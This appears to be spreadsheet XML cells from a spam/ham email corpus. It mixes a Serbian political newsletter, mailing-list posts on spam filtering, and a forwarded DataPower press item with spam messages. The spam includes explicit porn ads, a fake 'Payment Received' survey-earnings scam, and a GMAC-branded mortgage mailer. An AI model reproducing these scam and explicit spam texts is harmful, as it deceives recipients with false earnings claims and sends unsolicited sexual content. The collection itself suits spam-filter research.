         Procene idu dotle da se na septembarskim izborima ocekuje da Bata Zivojinovic osvoji tek 1% glasova.  Clanovi partije, najveci deo njih i danas veruje svom heroju, Slobodanu Milosevicu.
         Po clanstvu partije, ovih dana u rukovodstvu partije, oni koji su predsednika te stranke pogresno informisali poslednjih godina, kada su shvatili da im je ,,odzvonilo'' pokusavaju da sacuvaju sebe eliminacijom predsednika Slobodana Milosevica.
         Mladi socijalisti, kojih i nema bas mnogo, kako se SPS svojevremeno hvalio, izgleda su na strani predsednika te stranke. Tako se u nastupima na opstinskim odborima, mogu cuti uverljivi govori Dejana Stjepanovica i Igora Raicevica, i po neki Milinka Isakovica iz redova mladih socijalista, clanova organizaciono politickog odbora predsednika SPS. 
         Obracanja ovih mladih ljudi, medju clanstvom partije imaju do deset puta vecu tezuni, nego li obracanja profesionalnih politicara koji za sobom vuku teret proslosti.
          Stav rukovodstva mladih socijalista, se razlikuje od stava saveta mladih, koji su takodje na strani predsednika. 
          Branko Ruzic i Dejan Backovic, svojevremeno najveci branioci i zastupnici lika i dela Slobodana Milosevica, danas su se pretvorili u njegove najvece kriticare. Pokusavaju na sve moguce nacine da minorizuju grupu mladih koja ga podrzava.
          Cak se poslednjih dana cuje, da je najbolji recept da se rukovodstvo mladih odrzi ikao je protiv Sloba, da se povezu rodbinskim vezama, pa se tako predsednik mladih socijalista Beograda, Ana Djurovic udala za Branka Ruzica, predsednika Mladih socijalista Srbije, koji je za kuma uzeo Dejna Backovia, svog potpredsednika. Backovic se ovih dana zeni, jednom  mladom socijalistkinjom koja je clan saveta mladih, a u isto vreme i sestra jednog od clanova IO GO SPS-a, za kuma uzima jos jednog mladog socijalistu iz Saveta mladih. Sve u svemu, mladi u SPS se drze kao italijanske mafijaske porodice 60-tih u SAD.
           Sta ce se do kraja price dogoditi ostaje pitanje, no clanstvo i simpatizeri ce oceniti rad svog rukovodstva na predsednickim izborima.
           Pimato se samo, sta ce da rade, ako im Bata prodje losije od Seselja koga je predsednik Slobodan Milosevic podrzao za predsednickog kandidat?
 _______________________________________________________________________
 Powered by List Builder
 To unsubscribe follow the link:
 http://lb.bcentral.com/ex/sp?c=15279&amp;s=54EE057E0B6864FB&amp;m=5
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Internet creaks after huge network crash
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8561544,1440/
 Date: Not supplied
 WorldCom, the world's biggest internet traffic carrier, suffers a major outage 
 which affects millions of users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Re: SA SQL Prefs and MIMEDefang
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; The main reason I'd like to stick with a milter-based approach is the 
 &gt; ability to reject messages at the SMTP stage.  This way the recipient isn't 
 &gt; bothered and the sender knows immediately that the message failed.  My 
 &gt; understanding is that once it gets to Procmail, as far as the sender is 
 &gt; concerned, it got through.  And since all our users connect via POP, moving 
 &gt; things to another folder is not an option, so the only way to notify the 
 &gt; recipient is to allow the message through or replace it with a summary.
 I think the summary thingy, with a mail based retreive facility, is a
 good alternative. You avoid false positive, only one email to list all
 the spam you received in one day, and you have full per user pref.
 Olivier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</si>
  <si>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Hardware acceleration for SSL makes sense since PKI can slow down a
 transaction by as much as 1,000-fold. Per this article, XML formatting only
 increases doc size by about 20-fold.. I'm not sure there are enough "powers
 of ten" in there to justify hardware acceleration. 
 Expect the next major release from DataPower to be the revolutionary new
 "email chip" - allows you to offload the sending and receiving of email
 messages onto dedicated hardware while you get on w/ more important things
 .. like listening to MP3s..
 Best, 
 Paul Sholtz
 -----Original Message-----
 From: Rohit Khare
 To: fork@example.com
 Sent: 8/27/02 3:00 PM
 Subject: DataPower announces XML-in-silicon
 No analysis yet... don't know what to make of it yet. But here's the raw
 bits for all to peruse and check out what's really going on... Best, 
 Rohit
 ===========================================================
 DataPower delivers XML acceleration device
 ByScott Tyler Shafer
 August 27, 2002 5:46 am PT
 DATAPOWER TECHNOLOGY ON Monday unveiled its network device designed 
 specifically to process XML data. Unlike competing solutions that 
 process XML data in software, DataPower's device processes the data in 
 hardware -- a technology achievement that provides greater performance, 
 according to company officials.
 The new device, dubbed DataPower XA35 XML Accelerator, is the first in a
 family of products expected from the Cambridge, Mass.-based startup. The
 DataPower family is based on a proprietary processing core technology 
 called XG3 that does the analysis, parsing, and processing of the XML 
 data.
 According to Steve Kelly, CEO of DataPower, the XA35 Accelerator was 
 conceived to meet the steady adoption of XML, the anticipated future 
 proliferation of Web services, and as a means to share data between two 
 businesses.
 "Our vision is to build out an XML-aware infrastructure," Kelly said. 
 "The XA35 is the first of a family."
 Kelly explained that converting data into XML increases the file size up
 to 20 times. This, he said, makes processing the data very taxing on 
 application servers; DataPower believes an inline device is the best 
 alternative.
 In addition to the large file sizes, security is also of paramount 
 importance in the world of XML.
 "Today's firewalls are designed to inspect HTTP traffic only," Kelly 
 said. "A SOAP packet with XML will go straight through a firewall. 
 Firewalls are blind to XML today."
 Future products in DataPowers family will focus more specifically on 
 security, especially as Web services proliferate, Kelly said.
 According to DataPower, most existing solutions to offload XML 
 processing are homegrown and done in software -- an approach the company
 itself tried initially and found to be inadequate with regards to speed 
 and security. After trying the software path, the company turned to 
 creating a solution that would process XML in hardware.
 "Our XG3 execution core converts XML to machine code," said Kelly, 
 adding that to his knowledge no other company's solution does. Kelly 
 said in the next few months he expects the market to be flooded with 
 technologies that claim to do XML processing -- claims that he believes 
 will be mostly false.
 Other content-aware switches, such as SSL (secure socket layer) 
 accelerators and load balancers, look at the first 64 bytes of a packet,
 while the XA35 provides deeper packet inspection, looking at 1,400 bytes
 and thus enabling greater processing of XML data, Kelly explained.
 The 1U-high network device has been tested against a large collection of
 XML and XSL data types and can learn new flavors of the markup language 
 as they pass through the device.
 The XA35 can be deployed in proxy mode behind a firewall and a load 
 balancer, and it will inspect all traffic that passes and will identify 
 and process those packets that are XML, Kelly said.
 In addition to proxy mode, the device can also be used as an application
 co-processor. This deployment method gives administrators more granular 
 control over what data is inspected and the application server itself 
 controls the device.
 DataPower is not the only company chasing this emerging market. Startup 
 Sarvega, based in Burr Ridge, Ill., introduced the Sarvega XPE switch in
 May, and earlier this month Tarari, an Intel spin-off, launched with a 
 focus on content processing and acceleration.
 The DataPower device is now available, priced starting at $54,995. The 
 company has announced one customer to date and says the product is in 
 field trails at a number of other enterprises.
 ========================================================================
 =
 DataPower has been addressing enterprise networking needs since it was 
 founded in early 1999 by Eugene Kuznetsov, a technology visionary who 
 foresaw the adverse effects XML and other next generation protocols 
 would have on enterprise networks. Long before industry interest in XML 
 grew, Kuznetsov assembled a team of world-class M.I.T. engineers and 
 designed the industry's first solutions to address the unique 
 requirements for processing XML. The first such solution was a software 
 interpreter called DGXT. This software-based approach to XML processing 
 is still licensed by many companies for use in their own products today.
 Leveraging the detailed knowledge and customer experience gained from 
 developing software-based accelerators, Kuznetsov's team raised the bar 
 and designed a system for processing XML in purpose-built hardware. In 
 2001, DataPower's effort produced XML Generation Three (XG3), the 
 industry's fastest technology for XML processing, bar none.
 Today, XG3 technology powers the industry's first wire-speed XML 
 network devices, enabling secure, high-speed applications and XML Web 
 Services. While other companies are just now marketing first versions of
 products, DataPower is delivering its third generation of technology, 
 providing an immediate return on technology investments to 
 industry-leading customers and partners.
 DataPower's M.I.T. heritage is complemented by a management team that 
 brings decades of experience in the networking and computing industries,
 drawing veteran leaders from several successful companies including 
 Akamai, Argon, Cascade, Castle Networks, Sycamore and Wellfleet.
 ========================================================================
 =
 DataPower Technology Secures $9.5 Million in Funding
 Venrock Associates, Mobius Venture Capital and Seed Capital Back Pioneer
 in XML-Aware Networking for Web Services
 CAMBRIDGE, Mass. - July 8, 2002 - DataPower Technology, Inc., the 
 leading provider of XML-Aware network infrastructure, today announced 
 that it has secured $9.5 million in series B financing. Investors for 
 this round include Venrock Associates, Mobius Venture Capital and Seed 
 Capital Partners. Michael Tyrrell, of Venrock, Bill Burnham, of Mobius, 
 and Jeff Fagnan, of Seed Capital, have joined DataPowers Board of 
 Directors.
 DataPower will use this funding to accelerate development, marketing and
 sales of the companys breakthrough technology for XML-Aware networking.
 Founded in 1999, DataPower invented the worlds first intelligent XML 
 networkingdevices, capable of transforming XML traffic and transactions
 at the wire-speed enterprises need to effectively embrace Web services 
 and other XML-centric initiatives. DataPowers solutions are based on 
 its patent-pending XML Generation Three (XG3) technology.
 "Enterprises are adopting XML at rapid rate to facilitate inter-and 
 intra-company communications but their network infrastructure is ill 
 prepared to support the requirements of this new traffic type. 
 DataPowers XML-acceleration devices enable the wirespeed processing of 
 XML that is required to support next generation enterprise 
 applications," said Eugene Kuznetsov, CTO and founder of DataPower 
 Technology.
 "DataPower gives companies the ability to use XML thats critical to Web
 services projects without sacrificing an ounce of performance." A single
 DataPower acceleration engine delivers the processing power of 10 
 serversbreaking the performance bottleneck associated with XML 
 processing and delivering an extraordinary return on investment. In 
 addition, the DataPower platform provides enhanced XML security, 
 protection against XML-based denial-of-service attacks, connection of 
 e-business protocols for incompatible XML data streams, load balancing 
 between back-end servers and real-time statistics reports.
 "In the post-bubble economy, technology investment decisions require 
 laser-focused scrutiny. DataPowers patent-pending technology addresses 
 a very real and growing pain point for enterprises," said Michael 
 Tyrrell of Venrock Associates. "By turbo-charging their networks with 
 DataPowers unique XML-Aware networking technology, companies will be 
 free to adopt next generation Web services without encountering 
 performance and security pitfalls."
 "We looked long and hard for a company capable of addressing the rapidly
 growing problems surrounding XML message processing performance and 
 security," said Bill Burnham of Mobius Venture Capital. "DataPower is on
 their third generation of technology. Their patent pending XML 
 Generation Three (XG3)technology was quite simply the single most 
 compelling technology solution we have seen to date."
 "XML is not a nice-to-have, it is a must have for enterprises serious 
 about optimizing application efficiency. Since 1999, DataPower has been 
 developing solutions to facilitate enterprise use of XML and Web 
 services," said Jeff Fagnan of Seed Capital Partners. "DataPowers 
 XML-acceleration devices are a key requirement for enterprises that rely
 on XML for mission critical applications."
 About Venrock Associates
 Venrock Associates was founded as the venture capital arm of the 
 Rockefeller Family and continues a tradition of funding entrepreneurs 
 that now spans over seven decades. Laurance S. Rockefeller pioneered 
 early stage venture financing in the 1930s. With over 300 investments 
 over a span of more than 70 years, the firm has an established a track 
 record of identifying and supporting promising early stage, technology- 
 based enterprises. As one of most experienced venture firms in the 
 United States, Venrock maintains a tradition of collaboration with 
 talented entrepreneurs to establish successful, enduring companies. 
 Venrock's continuing goal is to create long-term value by assisting 
 entrepreneurs in building companies from the formative stages. Their 
 consistent focus on Information Technology and Life Sciences-related 
 opportunities provides a reservoir of knowledge and a network of 
 contacts that have proven to be a catalyst for the growth of developing 
 organizations. Venrock's investments have included CheckPoint Software, 
 USinternetworking, Caliper Technologies, Illumina, Niku, DoubleClick, 
 Media Metrix, 3COM, Intel, and Apple Computer. With offices in New York 
 City, Cambridge, MA, and Menlo Park, CA, Venrock is well positioned to 
 respond to opportunities in any locale. For more information on Venrock 
 Associates, please visit www.venrock.com
 About Mobius Venture Capital
 Mobius Venture Capital, formerly SOFTBANK Venture Capital, is a $2.5 
 billion U.S.-based private equity venture capital firm managed by an 
 unparalleled team of former CEOs and entrepreneurs, technology pioneers,
 senior executives from major technology corporations, and leaders from 
 the investment banking community. Mobius Venture Capital specializes 
 primarily in early-stage investments in the areas of: communications 
 systems software and services; infrastructure software and services; 
 professional services; enterprise applications; healthcare informatics; 
 consumer and small business applications; components; and emerging 
 technologies. Mobius Venture Capital combines its technology expertise 
 and broad financial assets with the industry's best entrepreneurs to 
 create a powerhouse portfolio of over 100 of the world's leading high 
 technology companies. Mobius Venture Capital can be contacted by 
 visiting their web site www.mobiusvc.com.
 About Seed Capital Partners
 Seed Capital Partners is an early-stage venture fund affiliated with 
 SoftBank Corporation, one of the world's leading Internet market forces.
 Seed Capital manages funds focused primarily on companies addressing 
 Internet-enabled business-to-business digital information technology 
 opportunities, which are located in the Northeastern U.S., the 
 southeastern region of the Province of Ontario, Canada, and Israel. Seed
 Capitals portfolio includes Spearhead Technologies, Concentric Visions 
 and CompanyDNA. For more information on Seed Capital Partners, please 
 visit www.seedcp.com.
 About DataPower Technology
 DataPower Technology provides enterprises with intelligent XML-Aware 
 network infrastructure to ensure unparalleled performance, security and 
 manageability of next-generation protocols. DataPowers patent-pending 
 XML Generation Three (XG3) technology powers the industrys first 
 wirespeed XML network devices, enabling secure, high-speed applications 
 and XML Web Services. Founded in 1999, DataPower is now delivering its 
 third generation of technology, providing immediate return on technology
 investments to industry-leading customers and partners. DataPower is 
 privately held and based in Cambridge, MA. Investors include Mobius 
 Venture Capital, Seed Capital Partners, and Venrock Associates.
 CONTACT:
 DataPower Technology, Inc.
 Kieran Taylor
 617-864-0455
 kieran@datapower.com
 Schwartz Communications
 John Moran/Heather Chichakly
 781-684-0770
 datapower@schwartz-pr.com
 ========================================================================
 Steve Kelly, chairman and CEO
 During over twenty years in the technology industry, Steve Kelly has 
 built and managed global enterprise networks, provided consulting 
 services to Fortune 50 businesses, and been involved in the launch of 
 several start-ups. Prior to DataPower, Kelly was an 
 entrepreneur-in-residence at Venrock Associates, and was co-founder of 
 Castle Networks, where he led the company's sales, service and marketing
 functions. Castle was acquired by Siemens AG in 1999 to create Unisphere
 Networks, which was subsequently purchased by Juniper Networks. Kelly 
 was an early contributor at Cascade Communications, where he built and 
 managed the company's core switching business; Cascade's annual revenues
 grew from $2 million to $300 million annually during Kelly's tenure. 
 Kelly also worked at Digital Equipment Corporation where he managed and 
 grew their corporate network to 50,000+ nodes in 28 countries, the 
 largest in the world at the time. Kelly has a B.S. in Information 
 Systems from Bentley College.
 Eugene Kuznetsov, founder, president and CTO
 Eugene Kuznetsov is a technology visionary that has been working to 
 address enterprise XML issues since the late 90s. Kuznetsov founded 
 DataPower Technology, Inc. in 1999 to provide enterprises with an 
 intelligent, XML-aware network infrastructure to support next-generation
 applications. Prior to starting DataPower, Kuznetsov led the Java JIT 
 Compiler effort for Microsoft Internet Explorer for Macintosh 4.0. He 
 was also part of the team which developed one of the first clean room 
 Java VM's. This high-speed runtime technology was licensed by some of 
 the industry's largest technology companies, including Apple Computer. 
 He has consulted to numerous companies and worked on a variety of 
 hardware and software engineering problems in the areas of memory 
 management, power electronics, optimized execution engines and 
 application integration. Kuznetsov holds a B.S. in electrical 
 engineering from MIT.
 Steve Willis, vice president of advanced technology
 Steve Willis is an accomplished entrepreneur and a pioneer in protocol 
 optimization. Prior to joining DataPower, Willis was co-founder and CTO 
 of Argon Networks, a provider of high-performance switching routers that
 was acquired by Siemens AG in 1999 to create Unisphere Networks; 
 Unisphere was subsequently purchased by Juniper Networks. Before Argon, 
 Steve was vice president of advanced technology at Bay Networks (now 
 Nortel Networks) where he led both IP and ATM-related technology 
 development and managed a group that generated 24 patent applications, 
 developed a 1 Mbps forwarding engine and led the specification of the 
 ATM Forum's PNNI routing protocol. Most notably, Steve was co-founder, 
 original software director and architect for Wellfleet Communications, a
 leading pioneer of multi-protocol routers. Wellfleet was rated as the 
 fastest growing company in the U.S. for two consecutive years by Fortune
 magazine. Willis is currently a member of the Institute of Electrical 
 and Electronics Engineers (IEEE) and the Internet Research Task Force 
 (IRTF) Routing Research Group. Willis has a B.D.I.C. in Computer Science
 from the University of Massachusetts.
 Bill Tao, vice president of engineering
 With a vast understanding of network optimization technologies and 
 extensive experience in LAN and WAN networking, Bill Tao brings over 25 
 years of critical knowledge to lead DataPower's engineering efforts. 
 Prior to DataPower, Tao was the vice president of engineering for 
 Sycamore Networks, developing a family of metro/regional optical network
 switches. He is also well acquainted with network optimization 
 techniques as he was previously vice president of engineering at 
 InfoLibria, where he led development and software quality assurance 
 engineering for a family of network caching products. Tao has held 
 senior engineering positions at NetEdge, Proteon, Codex and Wang. Tao 
 received a B.S. in Electrical Engineering from the University of 
 Connecticut and an M.S. in Computer Science from the University of 
 Illinois.
 Kieran Taylor, director of product marketing
 Kieran Taylor has an accomplished record as a marketing professional, 
 industry analyst and journalist. Prior to joining DataPower, Taylor was 
 the director of product management and marketing for Akamai Technologies
 (NASDAQ: AKAM). As an early contributor at Akamai, he helped develop the
 company's initial positioning and led the technical development and 
 go-to-market activities for Akamai's flagship EdgeSuite service. 
 Taylor's early contribution helped position the service provider to 
 secure a $12.6 billion IPO. He has also held senior marketing management
 positions at Nortel Networks, Inc. and Bay Networks. Taylor was 
 previously an analyst at TeleChoice, Inc. and the Wide Area Networks 
 editor for Data Communications, a McGraw Hill publication. Taylor holds 
 a B.A. in Print Journalism from the Pennsylvania State University School
 of Communications.
 =================================================================
 Board of Advisors
 Mark Hoover
 Mark Hoover is President and co-founder of Acuitive, Inc., a start-up 
 accelerator. With over 20 years experience in the networking industry, 
 Hoover's expertise spans product development, marketing, and business 
 development. Before launching Acuitive, Hoover worked at AT&amp;T Bell 
 Laboratories, AT&amp;T Computer Systems, SynOptics, and Bay Networks, where 
 he played a role in the development of key technologies, such as 
 10-BASET, routing, FDDI, ATM, Ethernet switching, firewall, Internet 
 traffic management, and edge WAN switch industries.
 George Kassabgi
 Currently Vice President of Engineering at BEA Systems, Mr. Kassabgi has
 held executive-level positions in engineering, sales and marketing, and 
 has spearheaded leading-edge developments in the application server 
 marketplace since 1996. He is widely known for his regular speaking 
 engagements at JavaOne, as well as columns and contributions in JavaPro,
 Java Developer's Journal and other publications. In addition to being a 
 venerated Java expert, George Kassabgi holds a patent on SmartObject 
 Technology, and authored the technical book Progress V8.
 Marshall T. Rose
 Marshall T. Rose runs his own firm, Dover Beach Consulting, Inc. He 
 formerly held the position of the Internet Engineering Task Force (IETF)
 Area Director for Network Management, one of a dozen individuals who 
 oversaw the Internet's standardization process. Rose is the author of 
 several professional texts on subjects such as Internet Management, 
 Electronic Mail, and Directory Services, which have been published in 
 four languages. He is well known for his implementations of core 
 Internet technologies (such as POP, SMTP, and SNMP) and OSI technologies
 (such as X.500 and FTAM). Rose received a PhD in Information and 
 Computer Science from the University of California, Irvine, in 1984.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;     &gt;&gt; &gt; ##Remove: jeremy@alum.mit.edu##
 &gt;
 &gt;     Tim&gt; Yuck: it got two 0.01's from embedding your email address at the
 &gt;     Tim&gt; bottom here.
 &gt;
 &gt; Which suggests that tagging email addresses in To/CC headers should be
 &gt; handled differently than in message bodies?
 I don't know whether it suggests that, but they would be tagged differently
 in to/cc if I were tagging them at all right now.  If I were tagging To:
 addresses, for example, the tokens would look like
     'to:email addr:mit'
 instead of
     'email addr:mit'
 as they appear when an email-like thingie is found in the body.  Whether
 email addresses should be stuck in as one blob or split up as they are now
 is something I haven't tested.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Amateur teens go bad
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;b&gt;
 &lt;a target=_blank href="http://65.123.227.151/ld/abg/?aid=919777"&gt;18 - 21 YR. OLD CHICKS ARE SO HORNY!&lt;/a&gt;&lt;br&gt;
 &lt;A target=_blank href="http://65.123.227.151/ld/abg/?aid=919777"&gt;
 &lt;br&gt;NASTY AMATEURS TAKING CUM SHOTS,&lt;br&gt; HUGE COCKS, ANAL POUNDINGS, &amp; MUCH MORE! &lt;br&gt;&lt;br&gt;
 YOUNG AND FRESH -----&gt; JUST A CLICK AWAY! &lt;br&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;font color="#ff0000" size="3"&gt; GET THEM NOW! FOR FREE!&lt;br&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;a target=_blank href="http://65.123.227.151/ld/abg/?aid=919777"&gt;CLICK HERE FOR THE GIRLS OF YOUR DREAMS!&lt;br&gt;REMEMBER THIS IS A FREE SITE SO HURRY!&lt;/a&gt;&lt;/b&gt;&lt;font size="3"&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;
 &lt;a href="http://65.123.227.151/ld/index.php?cid={$cid}&amp;eid={$eid}"&gt;Click here to unsubscribe&lt;/a&gt;.&lt;br&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Notification for Payment Received!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;head&gt;
 &lt;Font FACE=3D"Arial" color=3D"FF0000" size=3D5  &gt;
 &lt;BLOCKQUOTE&gt;&lt;BLOCKQUOTE&gt;
 &lt;title&gt;Notification for Payment Received!&lt;/title&gt;&lt;/FONT&gt;
 &lt;/head&gt;
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 					=09
 &lt;body background=3D"togeather.jpg" BGPROPERTIES=3Dfixed text=3D"#000000" =
 link=3D"#0000aa" vlink=3D"#0000aa" alink=3D"#aa0000"&gt;
 &lt;br&gt;&lt;b&gt;
 Notification for Payment Received !!!,&lt;br&gt;&lt;br&gt;
 This email confirms that you may receive
 $6,000.00 (Commissions) &lt;br&gt;Payment for LAST month
 for your 1 hours work a day. &lt;br&gt;&lt;br&gt;
 &lt;FONT COLOR=3D"#dd5555"&gt;&lt;b&gt;
 TRANSACTION INFORMATION:&lt;br&gt;
 Amount: $6,000.00&lt;br&gt;&lt;br&gt;
 Item/Product Name: &lt;br&gt;
 Number of Survey  12/day X 30/days =3D 120&lt;br&gt;&lt;br&gt;
 Item/Product Comission: &lt;br&gt;
 Average $/Survey  =3D $50&lt;br&gt;&lt;br&gt;
 Total: 120 surveys X $50 =3D $6,000&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;br&gt;&lt;br&gt;
 THIS IS A KIND OF EMAIL &lt;br&gt;YOU SHOULD RECEIVED
 AFTER YOUR FIRST MONTH&lt;br&gt;&lt;br&gt;
 Could be nice, don't you think ?&lt;br&gt;&lt;br&gt;
 *****************************************************&lt;br&gt;
 Hello!&lt;br&gt;
 Here is the Greatest Opportunity ever presented on Internet&lt;br&gt;
 YOU SURF THE WEB ALREADY, &lt;br&gt;
 SO WHY NOT GET PAID FOR IT...... &lt;br&gt;
 There are numerous market research companies &lt;br&gt;
 on the web willing to pay you strictly in cold CASH &lt;br&gt;
 (Guaranteed $15-$125 and more per survey) for simply giving &lt;br&gt;
 your opinions by participating in their surveys!&lt;br&gt;
 The more you sign up with, the more money you make! &lt;br&gt;
 How much you make is up to you.Easy calculation:&lt;br&gt;
 Let=92s say that you have one hour a day the most &lt;br&gt;
 of the survey will take 15 minutes&lt;br&gt;
 so you can fill out 4 surveys a day.&lt;br&gt;
 If you take 4 survey at $50 =3D $200 by 30 days =3D $6 000 a month&lt;br&gt;
 What about now if you spend 3 hours a day?&lt;br&gt;
 WOW $18 000 a month to stay home &lt;br&gt;
 and care about your family&lt;br&gt;
 The companies are sending you checks &lt;br&gt;
 usually 3 to 5 days after you did fill it out.&lt;br&gt;&lt;br&gt;
 Tell Your Friends About us!&lt;br&gt;
 We will pay you EVERY DAY for each sale you do!&lt;br&gt;&lt;br&gt;
 The rewards continue!  Telling your friends &lt;br&gt;
 about us is an outstanding business decision...  &lt;br&gt;
 Not only will we pay you for completing a survey, &lt;br&gt;
 But you will get pay for each survey that your friends fill out too!  &lt;br=
 &gt;&lt;br&gt;
  =20
 So don't wait another second join us NOW=20
 and have your friends sign up today!
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;FONT size=3D3 &gt;&lt;B&gt;ACT NOW AND GET YOUR COMPLIMENTARY=20
 3-DAY/2-NIGHT DREAM VACATION &lt;br&gt;
 as a special introductory offer! &lt;br&gt;ABSOLUTELY FREE!!!&lt;/B&gt;&lt;/FONT&gt;
 &lt;/CENTER&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;CENTER&gt;
 &lt;FONT size=3D+2 color=3D"#dd5555"&gt;&lt;B&gt;To get all details&lt;/B&gt;&lt;/FONT&gt;
 &lt;/CENTER&gt;
 =20
 &lt;CENTER&gt;
 &lt;!-- Common part --&gt;
 &lt;CENTER&gt;
 &lt;FONT size=3D+3 color=3D"#dd5555"&gt;&lt;B&gt;&lt;/B&gt;&lt;/FONT&gt;
 &lt;/CENTER&gt;
 &lt;P&gt;
 &lt;BLOCKQUOTE&gt;&lt;BLOCKQUOTE&gt;
 &lt;FONT size=3D+1&gt;
 &lt;CENTER&gt;
 &lt;br&gt;&lt;br&gt;
 Push button below.&lt;br&gt;
 &lt;FORM action=3D"mailto:mailmoreinfo@371.net?=3D&amp;subject=3DTell me how abo=
 ut the survey!&amp;body=3DPlease tell me about the surveys" method=3Dpost&gt;
 &lt;INPUT name=3Dbuttonpushed type=3Dsubmit value=3D"Send me that informatio=
 n"&gt;&lt;/FORM&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 YOU WANT TO BE REMOVED?&lt;br&gt;
 Push button below to be REMOVED=20
 &lt;FORM action=3D"mailto:removeme@371.net?=3D&amp;subject=3DRemove" method=3Dpo=
 st&gt;
 &lt;INPUT name=3Dbuttonpushed type=3Dsubmit value=3D" Remove me NOW"&gt;&lt;/FORM&gt;=
 &lt;br&gt;
 &lt;/BLOCKQUOTE&gt;&lt;/BLOCKQUOTE&gt;&lt;/BLOCKQUOTE&gt;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</si>
  <si>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Customer
</t>
  </si>
  <si>
    <t xml:space="preserve">Aware            8sLL
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta http-equiv="Content-Language" content="en-us"&gt;
 &lt;title&gt;Covering All 50 States&lt;/title&gt;
 &lt;meta content="Microsoft FrontPage 4.0" name="GENERATOR"&gt;
 &lt;meta content="FrontPage.Editor.Document" name="ProgId"&gt;
 &lt;style&gt;&lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#000066"&gt;
 &lt;div align="center"&gt;
  &lt;center&gt;
  &lt;table bordercolor="#3366ff" cellspacing="0" cellpadding="0" width="752" bgcolor="#ffffff" border="1"&gt;
   &lt;tbody&gt;
    &lt;tr&gt;
     &lt;td width="763"&gt;
      &lt;table cellspacing="0" cellpadding="0" width="756" align="center" border="0"&gt;
       &lt;tbody&gt;
        &lt;tr valign="top"&gt;
         &lt;td width="198" height="51"&gt;&lt;img src="https://www.gmacm-online.com/common/images/roof.jpg" width="197" height="51"&gt;&lt;/td&gt;
         &lt;td width="298" height="51"&gt;&lt;img src="https://www.gmacm-online.com/common/images/clouds.jpg" width="329" height="51"&gt;&lt;/td&gt;
         &lt;td width="260" height="51"&gt;&lt;img src="http://www.gmacmortgage.com/banners/People/Buying.jpg" width="235" height="51"&gt;&lt;/td&gt;
        &lt;/tr&gt;
       &lt;/tbody&gt;
      &lt;/table&gt;
      &lt;table height="1" cellspacing="0" cellpadding="0" width="754" align="center" border="0"&gt;
       &lt;tbody&gt;
        &lt;tr valign="top"&gt;
         &lt;td width="12" height="1"&gt;&lt;/td&gt;
         &lt;td width="131" height="1"&gt;&lt;img src="http://www.gmacmortgage.com/images/gmac_logo.gif" width="197" height="25"&gt;&lt;img src="http://www.gmacmortgage.com/images/mort_logo.gif" width="197" height="35"&gt;&lt;/td&gt;
         &lt;td width="86" bgcolor="#ffffff" height="1"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;td width="558" bgcolor="#ffffff" height="1"&gt;
          &lt;table cellspacing="0" cellpadding="0" width="563" border="0"&gt;
           &lt;tbody&gt;
            &lt;tr align="middle" bgcolor="#ffffff"&gt;
             &lt;td width="561" height="19"&gt;&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
              &lt;font color="#FF0000"&gt;July 29, 2002&lt;/font&gt;&lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
             &lt;td valign="top" bgcolor="#ffffff" height="1" width="561"&gt;&lt;img height="1" src="images/BLK_underNAV_Line.gif" width="554" border="0" name="BLK_underNAV_Line"&gt;&lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
             &lt;td valign="top" bgcolor="#ffffff" height="1" width="561"&gt;&amp;nbsp;&lt;/td&gt;
            &lt;/tr&gt;
           &lt;/tbody&gt;
          &lt;/table&gt;
         &lt;/td&gt;
        &lt;/tr&gt;
       &lt;/tbody&gt;
      &lt;/table&gt;
      &lt;table cellspacing="0" cellpadding="0" width="764" align="center" border="0" height="606"&gt;
       &lt;tbody&gt;
        &lt;tr valign="top" bgcolor="#ffffff"&gt;
         &lt;td width="200" height="606"&gt;&amp;nbsp;
          &lt;table cellspacing="0" cellpadding="0" width="180" border="0"&gt;
           &lt;tbody&gt;
            &lt;tr&gt;
             &lt;td valign="top" width="150" height="10"&gt;&lt;/td&gt;
            &lt;/tr&gt;
           &lt;/tbody&gt;
          &lt;/table&gt;
          &lt;table cellspacing="0" cellpadding="0" width="191" border="0"&gt;
           &lt;tbody&gt;
            &lt;tr valign="top"&gt;
             &lt;td width="11"&gt;&lt;/td&gt;
            &lt;/center&gt;
            &lt;td width="141" height="112"&gt;
             &lt;p align="right"&gt;&amp;nbsp;&lt;/p&gt;
             &lt;p align="right"&gt;&lt;img alt="Comstock, Image #KS8989" src="http://63.240.68.51/ImageWarehouse/RF/ThumbnailVersions/0008000/8500-8999/KS8989.JPG" border="0" width="108" height="72"&gt;&lt;/p&gt;
            &lt;/td&gt;
            &lt;center&gt;
            &lt;td width="33"&gt;&amp;nbsp;
             &lt;p&gt;&amp;nbsp;&lt;/p&gt;
             &lt;p&gt;&amp;nbsp;&lt;/p&gt;
             &lt;p&gt;&amp;nbsp;&lt;/p&gt;
            &lt;/td&gt;
            &lt;/tr&gt;
           &lt;/tbody&gt;
          &lt;/table&gt;
